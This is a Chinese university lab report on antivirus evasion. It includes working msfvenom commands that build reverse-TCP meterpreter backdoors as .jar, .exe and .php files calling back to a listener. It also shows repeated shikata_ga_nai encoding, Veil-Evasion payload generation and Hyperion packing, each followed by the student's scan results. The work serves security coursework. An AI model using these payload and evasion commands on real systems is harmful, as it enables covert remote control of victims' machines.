20164305 徐广皓 Exp3 免杀原理与实践

• 免杀原理及基础问题回答
• 实验内容
  • 任务一：正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧
    • 使用msf编码器生成各类后门程序及检测
    • 使用veil-evasion生成后门程序及检测
    • 半手工注入Shellcode并执行
  • 任务二：经过组合应用各类技术实现恶意代码免杀
  • 任务三：用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本

1、正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧

1. msfvenom生成.jar文件

• 生成java后门程序使用命令：

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 4305_backjar.jar

• 扫描结果以下

2. msfvenom生成.exe文件

• 与实验二相同，生成一次编码（端口号作实验的时候打错了o(╥﹏╥)o）

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.129 LPORT=6305 -f exe > met-encoded.exe

• 查杀结果：

• 十次编码使用命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.80.129 LPORT=6305 -f exe > msf4305.exe

• 查杀结果

3. msfvenom生成php文件

• 生成PHP命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 20164305.php

• 查杀结果

4. 使用veil-evasion生成后门程序及检测

安装veil

1 sudo apt-get install veil
2 sudo apt-get upgrade veil

• 而后我遇到群里出现的问题，也尝试了屡次更新可是也没效果（以下图）

• 这个问题实际上只须要请将Autolt3文件夹从Programe Files (x86)下移动到Programe Files文件夹下就能够解决。

使用veil

• 打开veil，veil

• 用use evasion命令进入Evil-Evasion

• 进入配置界面，use c/meterpreter/rev_tcp.py

• 输入generate生成文件，接着输入你想要playload名称

• 而后去查杀，结果。。。确定不行

5. 半手工注入Shellcode并执行

• 这部分我在实验2中就已经作过，详情请见连接。、

• 查杀结果

 

6.加壳自制后门

• 压缩壳

 

• 加密壳

  1 /usr/share/windows-binaries/hyperion/
  2 wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe

任务二：经过组合应用各类技术实现恶意代码免杀

因为懒惰，作本次试验拖了几天，看到不少同窗都达到了实验报告中免杀的要求，因而我就按部分同窗的制做思路，复现了一下，发现没有成功，具体状况以下

• 我看到了有同窗说利用手工shellcode、加密壳和压缩壳实现了免杀，因而我用helloworld的代码试验了一下
• 先编写一个helloworld，而后对其编译生成的exe文件进行压缩、加密、加密压缩的操做

• 而后在主机运行360的状况下，将这些exe文件都拷贝到主机上，发现

• 哦看起来只有压缩壳没啥问题，而后我又把压缩壳放到了网站上查杀了一下

• 虽然还没结束，但这报毒率比真正有毒的PHP文件都高。。。。。
• 那么问题来了，是我用的壳不对吗？而后我又看到有的同窗说先用py生成shellcode而后用加密壳就没有被查杀，我有复现了一遍，结果跟前面实验同样。。。。。
• 那看来要不就是个人360太强了，要不就是个人壳有问题。。。。。
• 还有一个问题，我在运行不加壳的c代码，360就自动给我杀了。。。。
• 因此但愿有利用半手工shellcode和壳作出免杀程序的同窗能够私聊我，教我一下是怎么作出来的（瞻仰大佬）Thanks♪(･ω･)ﾉ

 

实验总结与体会

 

• 实验感想

  无论是经过什么方法，只要用加密壳就必定被杀，只要用反弹链接就会生成meterpreter文件也会被杀，因此只是改变编码顺序并不能避免被杀，真心但愿前面作出来的同窗教我一下如何被免杀。

• 杀软是如何检测出恶意代码的？

  • 基于特征码
  • 实时监控
  • 基于行为的恶意软件检测

• 免杀是作什么？

  能够实现杀毒软件不发现、扫描不出病毒代码。

• 免杀的基本方法有哪些

  • 改变特征码
    • 加壳
    • shellcode+encoder
    • veil-evasion
    • 半手工化
  • 改变行为
    • 通信方式
      • 尽可能使用反弹式链接
      • 使用隧道技术
      • 加密通信数据
    • 操做系统
      • 基于内存操做
      • 减小对系统的修改
      • 加入混淆做用的正常功能代码

• 开启杀软能绝对防止电脑中恶意代码吗

  那必定是防不住的，杀毒软件是被动的防御方式，只有恶意代码的更新才会促进杀软的升级